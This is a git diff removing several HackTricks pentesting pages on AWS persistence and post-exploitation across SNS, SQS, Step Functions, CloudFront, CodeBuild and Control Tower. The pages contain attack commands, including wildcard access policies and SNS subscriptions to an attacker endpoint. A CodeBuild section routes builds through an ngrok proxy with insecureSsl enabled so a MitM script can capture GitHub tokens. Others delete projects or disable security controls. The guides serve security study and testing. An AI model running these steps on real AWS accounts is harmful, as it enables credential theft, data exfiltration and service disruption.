-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
deleted file mode 100644
index 9349605bc..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ /dev/null
@@ -1,79 +0,0 @@
-# AWS - Secrets Manager Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Secrets Manager - -For more info check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Via Resource Policies - -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. - -### Via Secrets Rotate Lambda - -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: - -```python -import boto3 - -def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') - - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) - -def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password - - # Example: Generate a new password - new_secret_value = generate_password() - - return new_secret_value - -def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team 
Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
deleted file mode 100644
index cb0b70d82..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ /dev/null
@@ -1,107 +0,0 @@
-# AWS - SNS Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## SNS
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-sns-enum.md" %}
-[aws-sns-enum.md](../aws-services/aws-sns-enum.md)
-{% endcontent-ref %}
-
-### Persistence
-
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
-
-```json
-{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__default_statement_ID",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": [
- "SNS:Publish",
- "SNS:RemovePermission",
- "SNS:SetTopicAttributes",
- "SNS:DeleteTopic",
- "SNS:ListSubscriptionsByTopic",
- "SNS:GetTopicAttributes",
- "SNS:AddPermission",
- "SNS:Subscribe"
- ],
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
- "Condition": {
- "StringEquals": {
- "AWS:SourceOwner": "318142138553"
- }
- }
- },
- {
- "Sid": "__console_pub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Publish",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- },
- {
- "Sid": "__console_sub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Subscribe",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- }
- ]
-}
-```
-
-### Create Subscribers
-
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
- -```bash -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
deleted file mode 100644
index 88c12a549..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ /dev/null
@@ -1,68 +0,0 @@
-# AWS - SQS Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SQS:*" - ], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] -} -``` - -{% hint style="info" %} -You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
deleted file mode 100644
index 0c7b2c9e4..000000000
--- a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# AWS - Step Functions Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Step Functions
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %}
-[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md)
-{% endcontent-ref %}
-
-### Step function Backdooring
-
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
-
-### Backdooring aliases
-
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
deleted file mode 100644
index 8a7a800b7..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# AWS - CloudFront Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CloudFront
-
-For more information check:
-
-{% content-ref url="../aws-services/aws-cloudfront-enum.md" %}
-[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md)
-{% endcontent-ref %}
-
-### Man-in-the-Middle
-
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
-
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
-
-* **Create** the malicious **function**.
-* **Associate** it with the CloudFront distribution.
-* Set the **event type to "Viewer Response"**.
-
-Accessing the response you could steal the users cookie and inject a malicious JS.
-
-#### scenario 2: MitM where CloudFront is already using a lambda function
-
-* **Modify the code** of the lambda function to steal sensitive information
-
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
deleted file mode 100644
index d0db82e8c..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ /dev/null
@@ -1,111 +0,0 @@
-# AWS - CodeBuild Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## CodeBuild - -For more information, check: - -{% content-ref url="../../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### Check Secrets - -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. - -{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Abuse CodeBuild Repo Access - -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: - -
- -The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. - -An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ -In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): - -
- -And **change the Buildspec commands to exfiltrate each repo**. - -{% hint style="warning" %} -However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -Or does he? Check the next section -{% endhint %} - -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: - -```bash -aws codebuild list-source-credentials -``` - -{% content-ref url="aws-codebuild-token-leakage.md" %} -[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md) -{% endcontent-ref %} - -### `codebuild:DeleteProject` - -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - -```bash -aws codebuild delete-project --name -``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. - -### `codebuild:TagResource` , `codebuild:UntagResource` - -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws codebuild tag-resource --resource-arn --tags -aws codebuild untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -### `codebuild:DeleteSourceCredentials` - -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - -```sql -aws codebuild delete-source-credentials --arn -``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
deleted file mode 100644
index 51a05bbb1..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ /dev/null
@@ -1,222 +0,0 @@
-# AWS Codebuild - Token Leakage
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: - -```bash -aws codebuild list-source-credentials -``` - -### Via Docker Image - -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. - -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. - -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. - -1. **Create & Upload your own Docker MitM image** - * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - * Create a **new Codebuild project** or **modify** the environment of an existing one. - * Set the project to use the **previously generated Docker image** - -
- -3. **Set the MitM proxy in your host** - -* As indicated in the **Github repo** you could use something like: - -```bash -mitmproxy --listen-port 4444 --allow-hosts "github.com" -``` - -{% hint style="success" %} -The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. -{% endhint %} - -4. **Run the build & capture the credentials** - -* You can see the token in the **Authorization** header: - -
- -This could also be done from the aws cli with something like - -{% code overflow="wrap" %} -```bash -# Create project using a Github connection -aws codebuild create-project --cli-input-json file:///tmp/buildspec.json - -## With /tmp/buildspec.json -{ - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } -} - -## Json - -# Start the build -aws codebuild start-build --project-name my-project2 -``` -{% endcode %} - -### Via insecureSSL - -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -* First you need to enumerate the current configuration with something like: - -```bash -aws codebuild batch-get-projects --name -``` - -* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). 
- * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like: - -{% code overflow="wrap" %} -```bash -aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' -``` -{% endcode %} - -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Next, click on **Build the project** or start the build from command line: - -```sh -aws codebuild start-build --project-name -``` - -* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -### ~~Via HTTP protocol~~ - -{% hint style="success" %} -**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** -{% endhint %} - -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. - -* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). - -
- -
- -* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -{% hint style="warning" %} -Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
deleted file mode 100644
index 1fa4d4d49..000000000
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# AWS - Control Tower Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Control Tower
-
-{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %}
-[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
-{% endcontent-ref %}
-
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
-
-{% code overflow="wrap" %}
-```bash
-aws controltower disable-control --control-identifier --target-identifier
-aws controltower enable-control --control-identifier --target-identifier
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
